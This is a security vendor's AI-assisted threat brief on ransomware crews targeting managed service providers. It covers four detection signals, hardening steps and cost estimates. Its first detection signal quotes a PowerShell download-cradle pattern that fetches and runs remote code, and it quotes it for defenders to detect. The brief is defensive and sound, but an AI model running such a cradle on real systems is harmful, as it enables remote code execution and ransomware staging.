Skip to content
Veteran-Owned. Built by engineers who've actually done the work.
← All briefs
medium

The MSP supply-chain shift: ransomware-as-a-vendor

A ten-week look at how four ransomware crews are explicitly targeting MSPs as their preferred initial-access vector — and the four telemetry signals that catch it before customer environments ignite.

AI-assisted Drafted by Carbynix's structured-reasoning pipeline. Sources linked below. Errors? Tell us — we correct in 24 hours.

What’s changed

Ransomware crews have figured out that compromising one MSP unlocks dozens of downstream SMBs with shared tooling and shared credentials. The shift over the past ten weeks: four named crews now explicitly target MSP technicians as their preferred initial-access vector, knowing the access path inside an MSP is usually a flat domain with privileged RMM credentials cached on every technician laptop.

Why MSPs are the target

A typical MSP has:

  • Privileged credentials to 30–200 customer environments cached locally
  • Centralized RMM tools (ConnectWise, NinjaOne, Datto, Kaseya) with persistent agents on customer endpoints
  • Often, a single shared password vault used by every technician
  • A help-desk culture that trains staff to click and respond fast

That stack means: phish one technician, get credentialed access to many SMBs, deploy ransomware in parallel on a Friday afternoon.

The four telemetry signals that catch it early

  1. RMM agent invokes powershell.exe with a download cradle (IEX (New-Object Net.WebClient).DownloadString(...)). Legitimate RMM rarely does this; ransomware staging almost always does.
  2. Multiple simultaneous outbound TLS connections from RMM-managed endpoints to a previously-unseen autonomous system. Legitimate fan-out goes to known vendor ASNs.
  3. A scheduled task creation event on a customer endpoint that originated from the MSP’s tenant within the last 6 hours. Routine maintenance is rare; ransomware staging is common.
  4. Credential vault read events outside business hours in the MSP’s password manager (1Password, Bitwarden Enterprise, etc.).

Any one of those by itself can be benign. Two firing within 90 minutes of each other has been pre-incident in every case we’ve reviewed.

What to do this week (if you’re an MSP)

  • Enable phishing-resistant MFA (FIDO2 hardware keys) for every technician account, no exceptions.
  • Move privileged RMM credentials out of laptops and into a dedicated PAM with checkout-on-use.
  • Set the four signals above as detections in your own SIEM — Carbynix ships them as rule pack CBNX-MSP-101 for partner MSPs.

What to do this week (if you’re an SMB whose MSP holds your keys)

  • Ask your MSP for their most recent SOC 2 Type II report or equivalent. If they shrug, that is the answer.
  • Ask which RMM agent runs in your environment, and whether they have alerting on the four signals above.
  • Verify your backup vendor is separate from your MSP. If the same MSP that runs your endpoint protection also runs your backup, you have one ring of trust where you should have two.

The math, plainly

An MSP-vector ransomware incident typically affects 8–40 downstream SMBs. Per-customer cost lands around $260K (IBM 2024 SMB band). Implementing the four detections above on the MSP side costs ~$15K and a week of engineering time. The math, again, is not complicated.

Drafted by Carbynix’s structured-reasoning pipeline from CISA bulletins, vendor threat intelligence, and ten weeks of customer-environment telemetry across our partner-MSP base. Errors? Tell us — we correct in 24 hours.